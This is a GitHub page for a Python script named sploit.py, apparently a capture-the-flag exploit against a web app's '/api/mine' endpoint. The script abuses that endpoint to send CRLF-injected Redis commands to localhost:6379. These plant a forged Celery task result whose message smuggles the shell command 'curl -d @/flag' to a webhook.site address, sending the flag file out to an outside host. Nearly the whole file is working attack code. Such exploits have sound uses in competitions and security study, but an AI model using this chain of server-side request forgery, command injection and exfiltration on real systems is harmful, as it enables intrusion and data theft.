-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsploit.py
executable file
·53 lines (45 loc) · 1.15 KB
/
sploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3
import json
import time
import uuid
import requests
import sys
hack_tmpl = json.loads('''
{
"status": "FAILURE",
"result": {
"exc_type": "InvalidHostException",
"exc_message": [
"localhost"
],
"exc_module": "app.miner"
},
"traceback": "",
"children": [],
"date_done": "2023-09-28T21:31:49.749340",
"task_id": ""
}
''')
sploit_uuid = str(uuid.uuid4())
hack_tmpl['task_id'] = sploit_uuid
hack_tmpl['result']['exc_message'][0] = f"localhost; curl -d @/flag https://webhook.site/73b29784-532b-40c6-954f-905e3ecedc68 "
pld = json.dumps(hack_tmpl)
print("PAYLOAD:")
print(pld)
celery_key = f'celery-task-meta-{sploit_uuid}'
mine_pld = {'url': 'http://localhost:6379',
'version': [f"\r\nSET {celery_key} '{pld}'\r\n", "1"]}
URL = sys.argv[1]
r = requests.post(f'{URL}/api/mine', json=mine_pld)
out = r.json()
print("MINE TASK ID:")
print(out)
# Wait until the celery task will be executed.
time.sleep(5)
task_id = out['task_id']
r = requests.get(f'{URL}/api/mine/{task_id}')
print("MINE TASK RESULT:")
print(r.text)
r = requests.get(f'{URL}/api/mine/{sploit_uuid}')
print("EXPLOIT RESULT:")
print(r.text)